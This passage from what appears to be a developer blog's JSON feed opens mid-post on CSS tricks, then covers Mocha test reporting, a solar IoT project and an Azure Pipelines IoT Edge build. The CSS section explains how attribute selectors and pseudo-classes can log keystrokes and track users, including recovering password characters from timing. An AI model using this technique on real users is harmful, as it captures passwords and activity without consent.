JavaScript to properly implement a “CSS keylogger”, but that doesn’t mean that you have to write the JavaScript.\nI just want to quickly touch on some points the author makes in this post. They state that it’s not really a big deal because the background-image is only done for the first match so repeated characters won’t pick up (e.g. a password of password will miss a s), and that is true (the value didn’t change the last character at pass so the selector wasn’t triggered) but the data capture will include timestamps and if you take a level of variance between the timestamp of events you can extrapolate your own gaps (if it took 0.1ms between captures and then there was an 0.5, maybe some characters were duplicated). The same goes for the observation that the order-of-receive isn’t guaranteed. That’s true, the server may receive them out of order, but when you have all (or 90+%) characters of a password the ability to brute force goes down drastically.\nUser Tracking with CSS This is not quite as scary as a keylogger but it does borrow the same underlying principle as the keylogger.\nFor this we’re going to exploit CSS Pseudo-Classes, which allow us to hook into a number of events of DOM elements.\nHover over me\nClick me Here’s the CSS that I applied to those elements:\n1 2 3 4 5 6 7 8 9 10 11 #demo-02 p:hover { background-color: #f0a; } #demo-02 input:focus { background-color: #bada55; } #demo-02 button:active { color: #ff0000; } I’m just using pseudo-classes like :hover, :focus and :active to know when you’ve done something and then change some colours, but again I could be setting the background-image to a tracking URL.\nHow could this be made useful? 
Well, think of it like implementing Google Analytics, you could do something like attach a :hover state to the body element so you know when the page is appearing for the user and then more hover states on all the child elements; as the user moves around the page you’re capturing the rough position of their cursor and knowing what they are spending their time on. If there’s a form you can work out how long they spent on each field, how they navigate forwards and backwards through a multi-step form, or if they change answers on radio buttons/checkboxes.\nLike the keylogger it isn’t as straight forward as it might seem, you would have to have a decent idea of the structure of the DOM to be able to create a really fine-grade tracker (or use JavaScript), but if you’re using it for your own analytics it’s very achievable.\nCSS is Turing Complete Ok, CSS + HTML if you want to be pedantic but it’s true, it is possible to implement Rule 110 with just CSS and HTML:\nCredit to eliheeli on GitHub for the working example of it.\nThis works by abusing Pesudo-classes like our tracker and combining those with the Adjacent sibling combinator. The adjacent sibing combinator, or + for short, works like this:\nI'm a paragraph.\nI'm an adjacent paragraph\n1 2 3 4 5 6 7 8 #demo-03 p { color: #00bb00; } #demo-03 p + p { font-family: "Comic Sans MS", sans serif; font-style: italic; } Here we’re applying a rule to all p elements, but then we’re using the adjacent sibling selector to apply a rule to the 2nd p only (in this case, turning on a different font family and style). By applying conditions on the first half of the selector, such as a pesudo-class, the cascade of the rules can be greatly limited.\nEmoji Class Names Who doesn’t love themselves a liberal usage of Emoji’s throughout their work? Well did you know that you can use Emoji as the class names in CSS? According to the spec they are technically valid, meaning you can do this:\nHello!\n1 2 3 4 5 6 7 #demo-04 .🤣 { font-family: "Comic Sans MS"; text-decoration: #f0a underline overline wavy; text-shadow: 2px 2px #bada55; transform: rotate(45deg); display: inline-block; } In reality you probably shouldn’t do this, but hey, you could shave a few bytes over the wire for the sake of a few users not being able to access your site (or dev on your codebase)!\nConclusion What started from a throw-away tweet became the catalyst for writing a post I’ve been meaning to do for a few years now! 🤣\nI hope you’ve enjoyed a look at a few things you can do with CSS, but maybe shouldn’t.\nWhat are your favourite ways to exploit CSS?\n", "id": "2019-08-14-css-can-do-this-and-its-terrifying" }, { "title": "Showing VS Code Extension Test Outputs in Azure Pipelines", "url": "https://www.aaron-powell.com/posts/2019-08-08-showing-vscode-extension-test-outputs-in-azure-pipelines/", "date": "Thu, 08 Aug 2019 10:26:12 +1000", "tags": [ "vscode", "testing", "azure-devops" ], "description": "A guide on how to display test outputs from VS Code Extension tests in Azure Pipelines", "content": "I’ve been working on my VS Code Profile Switching Extension and one thing that I wanted to ensure I was doing in it was writing tests. 
There’s a good guide on writing tests from the VS Code team which I recommend you read if you’re an extension author.\nIn this post, I want to look at how we can combine the output of our test runs in a Continuous Integration pipeline, for which I’ll be using Azure Pipelines (which is free for open source projects!).\nGenerating Test Output for Azure Pipelines Azure Pipelines supports a number of different test result formats in the Publish Test Results task that we’ll need to use and one of those is Xunit which Mocha supports out of the box.\nGreat, we can set the reporter to xunit by updating the test runner script:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 import * as path from "path"; import * as Mocha from "mocha"; import * as glob from "glob"; export function run(): Promise<void> { // Create the mocha test const mocha = new Mocha({ ui: "tdd", reporter: "xunit" //change the reporter to xunit }); mocha.useColors(true); const testsRoot = path.resolve(__dirname, ".."); return new Promise((c, e) => { glob("**/**.test.js", { cwd: testsRoot }, (err, files) => { if (err) { return e(err); } // Add files to the test suite files.forEach(f => mocha.addFile(path.resolve(testsRoot, f))); try { // Run the mocha test mocha.run(failures => { if (failures > 0) { e(new Error(`${failures} tests failed.`)); } else { c(); } }); } catch (err) { e(err); } }); }); } And this works nicely… except the xunit output is an XML file which, might be readable by a computer but it’s not ideal for local testing, I’d much prefer to use Spec (or Nyan!), but Mocha only supports a single reporter as the output.\nUsing Multiple Reports Thankfully, someone in the community has created a reporter for Mocha which is a pass-through that allows you to output to multiple reporters!\nStart by installing mocha-multi-reporters:\n1 npm install --save-dev mocha-multi-reporters Now we can change the way we configure Mocha to use as many output reporters as we want:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 import * as path from "path"; import * as Mocha from "mocha"; import * as glob from "glob"; import { createReport } from "../coverage"; export function run(): Promise<void> { const mocha = new Mocha({ ui: "tdd", timeout: 7500, reporter: "mocha-multi-reporters", reporterOptions: { reporterEnabled: "spec, xunit", xunitReporterOptions: { output: path.join(__dirname, "..", "..", "test-results.xml") } } }); mocha.useColors(true); // snip } Once combined with the Azure Pipeline task for publishing test results we’ll now see the output in Azure Pipelines!\nYou can check out my extensions Azure Pipelines.\n", "id": "2019-08-08-showing-vscode-extension-test-outputs-in-azure-pipelines" }, { "title": "Home Grown IoT - What's Next?", "url": "https://www.aaron-powell.com/posts/2019-08-02-home-grown-iot-whats-next/", "date": "Fri, 02 Aug 2019 09:22:44 +0800", "tags": [ "iot" ], "description": "What's next with my IoT project?", "content": "Over the last 8 posts I’ve looked at IoT solution design through local development and DevOps.\nAnd with that, we’re coming to the end of what I’ve built so far for my project and now it’s time to start thinking about what I could do next with it.\nVisualisation and Reporting This is the first thing that I want to target going forward with the project, some way to visualise the power generation. 
Right now, I’m just dumping the data into an Azure Table (see the post on Data Design) but not doing anything with it.\nWhen it comes to the visualisation platform there’s the question between build vs buy. I could create a series of charts and reports using SVG’s + React but then I’ll find myself in a situation where I’m going to be constantly tweaking the codebase or fixing bugs when the charts aren’t quite right.\nInstead, I’m going to invest in PowerBI which is part of the Microsoft platform and a really simple tool for creating reports from data sources.\nData Cleanup I have started playing with some reports in PowerBI and what it’s lead me to realise is that I’m likely going to have to do some cleanup to the data to make it simpler to report on. Right now, I’m getting data every 20 seconds from the inverter so for a day I have a lot of data samples. The problem is that this data is so fine grade that it becomes difficult to have clean and consistent views across it.\nInstead, it would be better to do a wider time slice that normalises the data, maybe aggregate it up into 10-minute chunks and take the mode of that time slice. This helps remove any noise from the data and produce a smoother view-over-time.\nI’m yet to work out what’ll be the best way to produce this normalisation of the data, but I’ll be sure to blog it once it’s done!\nIntegrating Other Data Sources Once you start producing a data set from a system you’re monitoring it’s worthwhile starting to think about other data sets that may provide greater context into the data that you’ve captured.\nIn my scenario of a monitoring solar energy generation, there’s one really useful piece of context that I could capture, the weather!\nBy tapping into a weather feed and storing that alongside the readings from the inverter I would be able to do correlative data analysis and answer questions like when the weather is sunny and it’s midday I generate X kw/hr.\nThis can then lead to being able to do anomily detection in my power generation. If I know what the weather is like I can predict the power generation, and if it doesn’t match the expected ranges that could indicate an issue with my panels (they need cleaning, they have sustained damage, etc.).\nAnd this is what is commonly referred to as Predictive Maintenance through IoT. On Microsoft Docs there is a walkthrough on how to create this yourself which I plan on looking into myself once I get to this phase of my project.\nConnected House What’s the end goal? A fully connected house!\nIf I’m able to predict the power generation then I could start optimising the utilisation of the appliances in our house. Are we generating at peak capacity? Time to run the washing machine and dishwasher.\nCombine this with battery storage (something on the plans to purchase) and you can predict whether to run off the battery during the day because the weather indicates you could recharge before the solar generation stops, and sell all generated energy back to the grid, maximising profits.\nAdmittedly, this one is going to be a harder sell to my wife, but I want to have stretch goals! 
😉\nConclusion I really hope you’ve enjoyed following this series as much as I have enjoyed making it.\nI went into this project not knowing anything about IoT and planning on just running a console app on a Raspberry Pi and talking to an Azure Functions, but throughout the journey I got to explore into a bunch of the Azure IoT tooling and got to the point where I can now push a commit to GitHub and have it deployed to a Raspberry Pi within 20 minutes.\n", "id": "2019-08-02-home-grown-iot-whats-next" }, { "title": "VS Code Profile Switcher Extensions Support", "url": "https://www.aaron-powell.com/posts/2019-07-25-profile-switcher-extensions-support/", "date": "Thu, 25 Jul 2019 13:46:04 +1000", "tags": [ "vscode" ], "description": "Adding extension management to the VS Code Profile Switcher", "content": "I’ve just released some updates to my VS Code Profile Switcher extension which adds the feature that was most required when I first announced it, extension support!\nExtension Support When creating a profile you might want to have different extensions loaded, say you’re doing some React work, maybe you don’t want the Vue extensions loaded, the more extensions you have installed, the more that VS Code has to activate, all of which takes time.\nNow when you save a profile (either new or overriding an existing) the extension will look at all the extensions that you have and add them to your extensions profile. Then when you next load that profile the extension will look at what extensions are loaded in VS Code, compare that to the list of extensions that the profile says you should have, and installs the missing ones while removing the excess ones.\nThis is slightly different to the way settings are handled, settings are addative, meaning that any settings a profile has will be merged over the top of existing settings, but this didn’t seem right for extensions.\nPerformance Considerations I’ll often flick between a number of profiles so I wanted to ensure that it performs decently. To this end when a profile removes an extension it moves it to globalStorage and then when it’s needed again it’ll copy it back in. If the extension doesn’t exist in globalStorage it will then install it from the marketplace. Installing from the marketplace does take time, and if you’ve got a lot of extensions that need to come from there it’ll take longer, but that shouldn’t happen too frequently.\nIgnoring Extensions There may be extensions that you always want installed, your preferred themes for example. There are also some extensions that the removal of can be problematic or they are quite large, such as Live Share.\nYou don’t really want to make sure they are in every single profile, so instead I’ve added a setting called profileSwitcher.extensionsIgnore. This is an array of extension ID’s that you want to be in every profile and by default I have these set to be ignored:\nshan.code-settings-sync ms-vsliveshare.vsliveshare ms-vsliveshare.vsliveshare-audio ms-vsliveshare.vsliveshare-pack If you want to add more you’ll need to edit your settings.json file and add the setting. 
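To sketch it out (the last ID is just a placeholder for whatever you want to keep), the setting looks something like this in settings.json:

"profileSwitcher.extensionsIgnore": [
    "shan.code-settings-sync",
    "ms-vsliveshare.vsliveshare",
    "ms-vsliveshare.vsliveshare-audio",
    "ms-vsliveshare.vsliveshare-pack",
    "your-publisher.your-favourite-theme"
]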
If you do manually set the setting you’ll need include those 4 above (assuming you want to keep ignoring them), as that’s the default until manually set.\nNote on Upgrading Just a quick note when upgrading to the latest release, if you saved a profile prior to 0.3.0 it will have no extensions associated with it, so you’ll want to resave that profile, otherwise when you switch it’ll think you don’t have any associated extensions in the profile and remove all of yours (see bug #6).\nWrap Up I was really happy to get this feature landed because nearly everyone asked me about it when I first released it! It was a little tricky, VS Code doesn’t really provide an API for doing this kind of stuff with extensions (can’t blame them, you don’t want to make it easy for extensions to manipulate other extensions!) but it seems to be working well now in the 0.3.3 release.\nIf you are using the extension I’d love to hear about it, know the kinds of things it’s helping you with and what features you’d like to see in the future.\n", "id": "2019-07-25-profile-switcher-extensions-support" }, { "title": "Home Grown IoT - Automated DevOps", "url": "https://www.aaron-powell.com/posts/2019-07-22-home-grown-iot-automated-devops/", "date": "Tue, 23 Jul 2019 10:43:14 +1000", "tags": [ "fsharp", "iot", "devops" ], "description": "Moving from manual DevOps to automated DevOps", "content": "Having had a look at some tools for deploying IoT applications there was one piece of the puzzle that was missing, automation. After all, one of my goals is to be able to deploy updates to my project without really any effort, I want the idea of doing a git push and then it just deploying.\nAnd that brings us to this post, a look at how we can do automated deployments of IoT projects using IoT Edge and Azure Pipelines.\nBefore we dive in, it’s worth noting that the IoT Edge team have guidance on how to do this on Microsoft Docs already, but it’ll generate you a sample project, which means you’d need to retrofit your project into it. That is what we’ll cover in this post, so I’d advise you to have a skim of the documentation first.\nDefining Our Process As we get started we should look at the process that we’ll go through to build and deploy the project. I’m going to split this into clearly defined Build and Release phases using the YAML Azure Pipelines component for building and then the GUI-based Release for deploying to the Pi. The primary reason I’m going down this route is, at the time of writing, the YAML Releases preview announced at //Build doesn’t support approvals, which is something I want (I’ll explain why later in this post).\nBuild Phase Within the Build phase our pipeline is going to be responsible for compiling the application, generating the IoT Edge deployment templates and creating the Docker images for IoT Edge to use.\nI also decided that I wanted to have this phase responsible for preparing some of the Azure infrastructure that I would need using Resource Manager Templates. 
The goal here was to be able to provision everything 100% from scratch using the pipeline, and so that you, dear reader, could see exactly what is being used.\nRelease Phase The Release phase will be triggered by a successful Build phase completion and responsible for creating the IoT Edge deployment and for deploying my Azure Functions to process the data as it comes in.\nTo do this I created separate “environments” for the Pi and Azure Functions, since I may deploy one and not the other, and also run these in parallel.\nGetting The Build On Let’s take a look at what is required to build the application ready for release. Since I’m using the YAML schema I’ll start with the triggers and variables needed:\n1 2 3 4 5 6 7 8 9 10 11 12 trigger: - master pr: none variables: azureSubscription: 'Sunshine Service Connection' azureResourceNamePrefix: sunshine buildConfiguration: 'Release' azureResourceLocation: 'Australia East' jobs: I only care about the master branch, so I’m only triggering code on that branch itself and I’m turning off pull request builds, since I don’t want to automatically build and release PR’s (hey, this is my house! 😝). There are a few variables we’ll need, mainly related to the Azure resources that we’ll generate, so let’s define them rather than having magic strings around the place.\nOptimising Builds with Jobs When it comes to running builds in Azure Pipelines it’s important to think about how to do this efficiently. Normally we’ll create a build definition which is a series of sequential tasks that are executed, we compile, package, prepare environments, etc. but this isn’t always the most efficient approach to our build. After all, we want results from our build as fast as we can.\nTo do this we can use Jobs in Azure Pipelines. A Job is a collection of steps to be undertaken to complete part of our pipeline, and the really nice thing about Jobs is that you can run them in parallel (depending on your licensing, I’ve made my pipeline public meaning I get 10 parallel jobs) and with a pipeline that generates a lot of Docker images, being able to do them in parallel is a great time saver!\nAlso, with different Jobs you can specify different agent pools, so you can run some of your pipeline on Linux and some of it on Windows. You can even define dependencies between Jobs so that you don’t try and push a Docker image to a container registry before the registry has been created.\nWith all of this in mind, it’s time to start creating our pipeline.\nBuilding the Application What’s the simplest thing we need to do in our pipeline? 
Compile our .NET code, so let’s start there:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 - job: Build pool: vmImage: "Ubuntu-16.04" steps: - script: dotnet build --configuration $(buildConfiguration) displayName: "dotnet build $(buildConfiguration)" - task: DotNetCoreCLI@2 inputs: command: "publish" arguments: "--configuration $(BuildConfiguration)" publishWebProjects: false zipAfterPublish: false displayName: dotnet publish - task: ArchiveFiles@2 inputs: rootFolderOrFile: "$(Build.SourcesDirectory)/src/Sunshine.Downloader/bin/$(BuildConfiguration)/netcoreapp2.2/publish" includeRootFolder: false archiveFile: "$(Build.ArtifactStagingDirectory)/Sunshine.Downloader-$(Build.BuildId).zip" displayName: Archive Downloader - task: ArchiveFiles@2 inputs: rootFolderOrFile: "$(Build.SourcesDirectory)/src/Sunshine.Functions/bin/$(BuildConfiguration)/netcoreapp2.1/publish" includeRootFolder: false archiveFile: "$(Build.ArtifactStagingDirectory)/Sunshine.Functions-$(Build.BuildId).zip" displayName: Archive Functions - task: ArchiveFiles@2 inputs: rootFolderOrFile: "$(Build.SourcesDirectory)/src/Sunshine.MockApi/bin/$(BuildConfiguration)/netcoreapp2.2/publish" includeRootFolder: false archiveFile: "$(Build.ArtifactStagingDirectory)/Sunshine.MockApi-$(Build.BuildId).zip" displayName: Archive MockApi - task: PublishBuildArtifacts@1 displayName: "Publish Artifact" continueOnError: true inputs: artifactName: Apps The Build job is your standard .NET Core pipeline template, we run the dotnet build using the configuration we define in the variables (defaulted to Release), then do a dotnet publish to generate the deployable bundle and then zip each project as artifacts for the pipeline. The reason I publish all the projects as artifacts, even though the IoT component will be Dockerised, is so I can download and inspect the package in the future if I want to.\nOnto creating our IoT Edge deployment packages.\nBuild IoT Edge Deployment Packages To create the IoT Edge deployment packages we need to do three things, create the Docker image, push it to a container registry and create our deployment template (which we looked at in the last post).\nCreating a Container Registry But this means we’ll need a container registry to push to. I’m going to use Azure Container Registry (ACR) as it integrates easily from a security standpoint across my pipeline and IoT Hub, but you can use any registry you wish. And since I’m using ACR I need it to exist. You could do this by clicking through the portal, but instead, I want this scripted and part of my git repo so I could rebuild if needed, and for that, we’ll use a Resource Manager template:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 { "resources": [ { "type": "Microsoft.ContainerRegistry/registries", "sku": { "name": "[parameters('registrySku')]" }, "name": "[variables('registryName')]", "apiVersion": "2017-10-01", "location": "[parameters('location')]", "properties": { "adminUserEnabled": false } } ], "parameters": { "name": { "type": "string", "metadata": { "description": "Short name for the resources within this stack" } }, "location": { "type": "string" }, "registrySku": { "defaultValue": "Standard", "type": "string", "metadata": { "description": "The SKU of the container registry." 
} } }, "variables": { "registryName": "[concat(parameters('name'), 'cr')]" }, "outputs": { "acrUrl": { "type": "string", "value": "[concat(variables('registryName'), '.azurecr.io')]" }, "acrName": { "type": "string", "value": "[variables('registryName')]" }, "subscriptionId": { "type": "string", "value": "[subscription().id]" } }, "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", "contentVersion": "1.0.0.0" } Which we can run from the pipeline with this task:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 - job: PrepareAzureACR displayName: Prepare Azure ACR pool: vmImage: "Ubuntu-16.04" steps: - task: AzureResourceGroupDeployment@2 displayName: "Azure Deployment:Create ACR" inputs: azureSubscription: "$(azureSubscription)" resourceGroupName: "$(azureResourceNamePrefix)-shared" location: "$(azureResourceLocation)" templateLocation: Linked artifact csmFile: "$(Build.SourcesDirectory)/.build/acr.json" overrideParameters: '-name $(azureResourceNamePrefix) -registrySku "Basic" -location "$(azureResourceLocation)"' deploymentOutputs: ResourceGroupDeploymentOutputs Notice here I’m using the variables defined early on for the -name and -location parameters. This helps me have consistency naming of resources. I’m also putting this into a resource group called $(azureResourceNamePrefix)-shared because if I wanted to have the images used in both production and non-production scenario (which I could be doing if I had more than just my house that I was building against). The last piece to note in the task is that the templateLocation is set to Linked artifact, which tells the task that the file exists on disk at the location defined in csmFile, rather than pulling it from a URL. This caught me out for a while, so remember, if you want to keep your Resource Manager templates in source control and use the version in the clone, set the templateLocation to Linked artifact and set a csmFile path.\nWhen it comes to creating the IoT Edge deployment template I’m going to need some information about the registry that’s just been created, I’ll need the name of the registry and the URL of it. To get those I’ve created some output variables from the template:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... "outputs": { "acrUrl": { "type": "string", "value": "[concat(variables('registryName'), '.azurecr.io')]" }, "acrName": { "type": "string", "value": "[variables('registryName')]" }, "subscriptionId": { "type": "string", "value": "[subscription().id]" } }, ... But how do we use those? Well initially the task will dump them out as a JSON string in a variable, defined using deploymentOutputs: ResourceGroupDeploymentOutputs, but now we need to unpack that and set the variables we’ll use in other tasks. 
I do this with a PowerShell script:\n1 2 3 4 5 6 7 8 9 10 11 param ( [Parameter(Mandatory=$true)] [string] $ResourceManagerOutput ) $json = ConvertFrom-Json $ResourceManagerOutput Write-Host "##vso[task.setvariable variable=CONTAINER_REGISTRY_SERVER;isOutput=true]$($json.acrUrl.value)" Write-Host "##vso[task.setvariable variable=CONTAINER_REGISTRY_SERVER_NAME;isOutput=true]$($json.acrName.value)" Write-Host "##vso[task.setvariable variable=SUBSCRIPTION_ID;isOutput=true]$($json.subscriptionID.value)" Executed with a task:\n1 2 3 4 5 6 7 - task: PowerShell@2 displayName: Convert ARM output to environment variables name: armVar inputs: targetType: filePath filePath: '$(Build.SourcesDirectory)/.build/Set-BuildResourceManagerOutput.ps1' arguments: -ResourceManagerOutput '$(ResourceGroupDeploymentOutputs)' Now in other tasks I can access CONTAINER_REGISTRY_SERVER as a variable.\nPreparing the IoT Edge Deployment I want to create three Docker images, the ARM32 image which will be deployed to the Raspberry Pi, but also an x64 image for local testing and an x64 image with the debugger components. And this is where our use of Jobs will be highly beneficial, from my testing each of these takes at least 7 minutes to run, so running them in parallel drastically reduces our build time.\nTo generate the three images I need to execute the same set of tasks three times, so to simplify that process we can use Step Templates (side note, this is where I came across the issue I described here on templates and parameters).\n1 2 3 4 5 6 7 8 9 parameters: name: "" ARTIFACT_STORAGE_NAME: "" CONTAINER_REGISTRY_SERVER: "" SUBSCRIPTION_ID: "" CONTAINER_REGISTRY_SERVER_NAME: "" defaultPlatform: "" azureResourceNamePrefix: "" azureSubscription: "" We’ll need a number of bits of information for the tasks within our template, so we’ll start by defining a bunch of parameters. Next, let’s define the Job:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 jobs: - job: ${{ parameters.name }} displayName: Build Images for IoT Edge (${{ parameters.defaultPlatform }}) dependsOn: - PrepareArtifactStorage - PrepareAzureACR - Build pool: vmImage: 'Ubuntu-16.04' variables: CONTAINER_REGISTRY_SERVER: ${{ parameters.CONTAINER_REGISTRY_SERVER }} SUBSCRIPTION_ID: ${{ parameters.SUBSCRIPTION_ID }} CONTAINER_REGISTRY_SERVER_NAME: ${{ parameters.CONTAINER_REGISTRY_SERVER_NAME }} ARTIFACT_STORAGE_NAME: ${{ parameters.ARTIFACT_STORAGE_NAME }} steps: To access a template parameter you need to use ${{ parameters.<parameter name> }}. I’m providing the template with a unique name in the name parameter and then creating a display name using the architecture (AMD64, ARM32, etc.).\nNext, the Job defines a few dependencies, the Build and PrepareAzureACR Jobs we’ve seen above and I’ll touch on the PrepareArtifactStorage shortly. 
Finally, this sets the pool as a Linux VM and converts some parameters to environment variables in the Job.\nLet’s start looking at the tasks:\n- task: DownloadBuildArtifacts@0 displayName: "Download Build Artifacts" inputs: artifactName: Apps downloadPath: $(System.DefaultWorkingDirectory) - task: ExtractFiles@1 displayName: Unpack Build Artifact inputs: destinationFolder: "$(Build.SourcesDirectory)/src/Sunshine.Downloader/bin/$(BuildConfiguration)/netcoreapp2.2/publish" archiveFilePatterns: $(System.DefaultWorkingDirectory)/Apps/Sunshine.Downloader-$(Build.BuildId).zip Since the Job that’s running here isn’t on the same agent that did the original build of our .NET application we need to get the files. Thankfully we published them as an artifact, so it’s just a matter of downloading them and unpacking them into the right location. I’m unpacking them back to where the publish originally happened; because the Job does a git clone initially (I need that to get the module.json and deployment.template.json for IoT Edge) I may as well pretend I’m using the normal structure.\nCode? ✔. Deployment JSON? ✔. Time to use the IoT Edge tools to create some deployment files. Thankfully, there’s an IoT Edge task for Azure Pipelines, and that will do nicely.\n- task: AzureIoTEdge@2 displayName: Azure IoT Edge - Build module images (${{ parameters.defaultPlatform }}) inputs: templateFilePath: "$(Build.SourcesDirectory)/.build/deployment.template.json" defaultPlatform: ${{ parameters.defaultPlatform }} - task: AzureIoTEdge@2 displayName: Azure IoT Edge - Push module images (${{ parameters.defaultPlatform }}) inputs: action: "Push module images" templateFilePath: "$(Build.SourcesDirectory)/.build/deployment.template.json" azureSubscriptionEndpoint: ${{ parameters.azureSubscription }} azureContainerRegistry: '{"loginServer":"$(CONTAINER_REGISTRY_SERVER)", "id" : "$(SUBSCRIPTION_ID)/resourceGroups/${{ parameters.azureResourceNamePrefix }}-shared/providers/Microsoft.ContainerRegistry/registries/$(CONTAINER_REGISTRY_SERVER_NAME)"}' defaultPlatform: ${{ parameters.defaultPlatform }} The first task will use the deployment.template.json file to build the Docker image for the platform that we’ve specified. As I noted in the last post, you’ll need to have the CONTAINER_REGISTRY_USERNAME, CONTAINER_REGISTRY_PASSWORD and CONTAINER_REGISTRY_SERVER environment variables set so they can be substituted into the template. We get CONTAINER_REGISTRY_SERVER from the parameters passed in (unpacked as a variable) but what about the other two? They are provided by the integration between Azure and Azure Pipelines, so you don’t need to set them explicitly.\nOnce the image is built we execute the Push module images command on the task which will push the image to our container registry. Since I’m using ACR I need to provide a JSON object which contains the URL for the ACR and the id for it.
The id is a little tricky: you need to generate the full resource identifier, which means joining each segment together, resulting in $(SUBSCRIPTION_ID)/resourceGroups/${{ parameters.azureResourceNamePrefix }}-shared/providers/Microsoft.ContainerRegistry/registries/$(CONTAINER_REGISTRY_SERVER_NAME) which would become <some guid>/resourceGroups/sunshine-shared/providers/Microsoft.ContainerRegistry/registries/sunshinecr.\nFinally, we need to publish our deployment.platform.json file that the Release phase will execute to deploy a release to a device, but there’s something to be careful about here. When the deployment is generated the container registry information is replaced with the credentials needed to talk to the registry. This is so the deployment, when pulled to the device, is able to log into your registry. The catch is that your credentials are now stored in a file that needs to be attached to the build. The standard template generated in the docs will attach this as a build artifact, just like our compiled application, and this works really well for most scenarios. The downside is that anyone who has access to your build artifacts also has access to your container registry credentials, which is something that you may not want. This bit me when I realised that, because my pipeline is public, everyone had access to my container registry credentials! I then quickly deleted that ACR as the credentials were now compromised! 🤦‍♂️\nSecuring Deployments We want to secure the deployment so that our build server isn’t a vector into our infrastructure, and that means we can’t attach the deployment files as build artifacts.\nThis is where the other dependency on this Job, PrepareArtifactStorage, comes in.
Instead of pushing the deployment file as an artifact I push it to an Azure storage account:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 - job: PrepareArtifactStorage displayName: Setup Artifact Storage Azure Resources pool: vmImage: "Ubuntu-16.04" steps: - task: AzureResourceGroupDeployment@2 displayName: "Azure Deployment: Artifact Storage" inputs: azureSubscription: "$(azureSubscription)" resourceGroupName: "$(azureResourceNamePrefix)-shared" location: "$(azureResourceLocation)" templateLocation: Linked artifact csmFile: "$(Build.SourcesDirectory)/.build/artifact-storage.json" overrideParameters: '-name $(azureResourceNamePrefix) -location "$(azureResourceLocation)"' deploymentOutputs: ResourceGroupDeploymentOutputs - task: PowerShell@2 displayName: Convert ARM output to environment variables name: artifactVars inputs: targetType: filePath filePath: "$(Build.SourcesDirectory)/.build/Set-ArtifactStorageResourceManagerOutput.ps1" arguments: -ResourceManagerOutput '$(ResourceGroupDeploymentOutputs)' This uses a Resource Manager template that just creates the storage account:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 { "resources": [ { "apiVersion": "2015-06-15", "type": "Microsoft.Storage/storageAccounts", "name": "[variables('artifactStorageName')]", "location": "[parameters('location')]", "properties": { "accountType": "Standard_LRS" } } ], "parameters": { "name": { "type": "string", "metadata": { "description": "Name prefix for the resources to be created" } }, "location": { "type": "string", "metadata": { "description": "Azure Region for each resource to be created in" } } }, "variables": { "artifactStorageName": "[replace(concat(parameters('name'), 'artifacts'), '-', '')]" }, "outputs": { "artifactStorageName": { "type": "string", "value": "[variables('artifactStorageName')]" } }, "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", "contentVersion": "1.0.0.0" } And a PowerShell script to get the outputs into variables:\n1 2 3 4 5 6 7 8 9 param ( [Parameter(Mandatory=$true)] [string] $ResourceManagerOutput ) $json = ConvertFrom-Json $ResourceManagerOutput Write-Host "##vso[task.setvariable variable=ARTIFACT_STORAGE_NAME;isOutput=true]$($json.artifactStorageName.value)" Pushing Artifacts to Storage Now we can complete our IoT Job by using the storage account as the destination for the artifact:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 - task: AzureCLI@1 displayName: Upload deployment artifact inputs: azureSubscription: ${{ parameters.azureSubscription }} scriptLocation: inlineScript arguments: $(ARTIFACT_STORAGE_NAME) $(Build.ArtifactStagingDirectory) ${{ parameters.defaultPlatform }} $(Build.BuildId) inlineScript: | account_name=$1 key=$(az storage account keys list --account-name $account_name | jq '.[0].value') exists=$(az storage container exists --account-name $account_name --name artifacts --account-key $key | jq '.exists') if [ "$exists" == false ]; then az storage container create --name artifacts --account-name $account_name --account-key $key fi az storage blob upload --container-name artifacts --file $2/deployment.$3.json --name $4/deployment.$3.json --account-name $account_name --account-key $key I’m using the Azure CLI rather than AzCopy because I’m running on a Linux agent. It executes a script that will get the account key from the storage account (so I can write to it), checks if there is a container (script everything, don’t assume!) 
and then uploads the file into a folder in the storage container that prefixes with the Build.BuildId so I know which artifact to use in the release phase.\nUsing The Template The template that I’ve defined for the IoT Job is in a separate file called template.iot-edge.yml, and we’ll need to execute that from our main azure-pipelines.yml file:\n1 2 3 4 5 6 7 8 9 10 - template: .build/template.iot-edge.yml parameters: name: BuildImages_arm32v7 CONTAINER_REGISTRY_SERVER: $[dependencies.PrepareAzureACR.outputs['armVar.CONTAINER_REGISTRY_SERVER']] SUBSCRIPTION_ID: $[dependencies.PrepareAzureACR.outputs['armVar.SUBSCRIPTION_ID']] CONTAINER_REGISTRY_SERVER_NAME: $[dependencies.PrepareAzureACR.outputs['armVar.CONTAINER_REGISTRY_SERVER_NAME']] ARTIFACT_STORAGE_NAME: $[dependencies.PrepareArtifactStorage.outputs['artifactVars.ARTIFACT_STORAGE_NAME']] defaultPlatform: arm32v7 azureResourceNamePrefix: $(azureResourceNamePrefix) azureSubscription: $(azureSubscription) We’re relying on the outputs from a few other Jobs, and to access those we use $[dependencies.JobName.outputs['taskName.VARIABLE_NAME']], and then they are passed into the template for usage (remember to assign them to template variables or they won’t unpack).\nCreating Our Azure Environment There’s only one thing left to do in the build phase, prepare the Azure environment that we’ll need. Again we’ll use a Resource Manager template to do that, but I won’t embed it in the blog post as it’s over 400 lines, instead, you can find it here.\nWhen creating the IoT Hub resource with the template you can provision the routing like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 ... "routing": { "endpoints": { "serviceBusQueues": [], 